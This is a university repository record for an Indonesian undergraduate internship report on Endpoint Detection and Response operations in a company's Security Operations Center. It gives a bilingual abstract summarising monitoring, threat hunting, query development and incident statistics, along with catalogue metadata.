Analisis Operasional Endpoint Detection and Response (EDR) pada Security Operations Center (SOC) di PT Serasi Autoraya

Sinambela, Riyanda Cavin (2026) Analisis Operasional Endpoint Detection and Response (EDR) pada Security Operations Center (SOC) di PT Serasi Autoraya. Project Report. [s.n.], [s.l.]. (Unpublished)

[thumbnail of 5025221100-Project_Report.pdf] Text
5025221100-Project_Report.pdf - Accepted Version
Restricted to Repository staff only
Download (3MB) | Request a copy

Abstract

Peningkatan kompleksitas ancaman keamanan siber menuntut penerapan mekanisme deteksi dan respons yang efektif pada tingkat endpoint. Laporan Kerja Praktik ini membahas analisis operasional Endpoint Detection and Response (EDR) pada Security Operations Center (SOC) yang berada di bawah Divisi Cyber Security & Compliance (CSC) PT Serasi Autoraya. Metode yang digunakan bersifat deskriptif-analitis dengan pendekatan studi kasus melalui keterlibatan langsung dalam aktivitas operasional SOC, yang mencakup monitoring, investigasi detection dan incident, threat hunting, serta analisis data telemetry endpoint. Aktivitas operasional meliputi monitoring dashboard EDR, investigasi aktivitas mencurigakan pada endpoint, serta threat hunting terhadap beberapa skenario ancaman, antara lain potensi eksploitasi EternalBlue, akses ke domain berisiko, penggunaan akun administrator lokal, dan penyalahgunaan Background Intelligent Transfer Service (BITS). Selain itu, dilakukan penyusunan dan pengelolaan lebih dari 140 query EDR yang diklasifikasikan berdasarkan kebutuhan operasional dan jenis ancaman, serta perancangan Custom Indicator of Attack (IoA) berbasis perilaku untuk meningkatkan kapabilitas deteksi proaktif. Berdasarkan hasil kegiatan operasional, sistem EDR mencatat sebanyak 11.599 detection serta 31 incident yang ditangani dan diinvestigasi secara langsung. Hasil investigasi menunjukkan bahwa sebagian besar detection dan incident diklasifikasikan sebagai false positive setelah dilakukan analisis mendalam terhadap konteks aktivitas, process tree, serta validasi dengan tim terkait. Hasil Kerja Praktik ini menunjukkan peran strategis EDR dalam mendukung operasional SOC, meningkatkan efektivitas monitoring dan investigasi, serta memperkuat postur keamanan endpoint melalui pendekatan deteksi berbasis perilaku dan dokumentasi operasional yang terstruktur.
===================================================================================================================================
The increasing complexity of cybersecurity threats necessitates the implementation of effective detection and response mechanisms at the endpoint level. This Internship Report presents an operational analysis of Endpoint Detection and Response (EDR) within the Security Operations Center (SOC) under the Cyber Security & Compliance (CSC) Division of PT Serasi Autoraya. The methodology employed is descriptive-analytical, utilizing a case study approach based on direct involvement in SOC operational activities, including monitoring, investigation of detections and incidents, threat hunting, and analysis of endpoint telemetry data. Operational activities encompassed continuous monitoring of the EDR dashboard, investigation of suspicious activities on endpoints, and threat hunting across multiple threat scenarios. These scenarios included potential exploitation of EternalBlue, access to high-risk domains, use of local administrator accounts, and abuse of the Background Intelligent Transfer Service (BITS). In addition, more than 140 EDR queries were developed and managed, classified according to operational requirements and threat categories. Custom Indicators of Attack (IoAs) based on behavioral analysis were also designed to enhance proactive detection capabilities.
Based on the operational results, the EDR system recorded a total of 11,599 detections and 31 incidents, all of which were directly handled and investigated. The investigation results indicate that the majority of detections and incidents were classified as false positives after in-depth analysis of activity context, process trees, and validation in coordination with relevant teams. Overall, the findings of this Internship demonstrate the strategic role of EDR in supporting SOC operations, improving the effectiveness of monitoring and investigation processes, and strengthening endpoint security posture through behavior-based detection and well-structured operational documentation.

Item Type: Monograph (Project Report)
Uncontrolled Keywords: Endpoint Detection and Response (EDR), Security Operations Center (SOC), Threat Hunting, Indicator of Attack (IoA), Incident Response
Subjects: T Technology > TK Electrical engineering. Electronics Nuclear engineering > TK5105 Data Transmission Systems
Divisions: Faculty of Industrial Technology > Informatics Engineering > 55201-(S1) Undergraduate Thesis
Depositing User: Riyanda Cavin Sinambela
Date Deposited: 22 Jan 2026 01:20
Last Modified: 22 Jan 2026 01:20
URI: http://repository.its.ac.id/id/eprint/130038

Actions (login required)

View Item View Item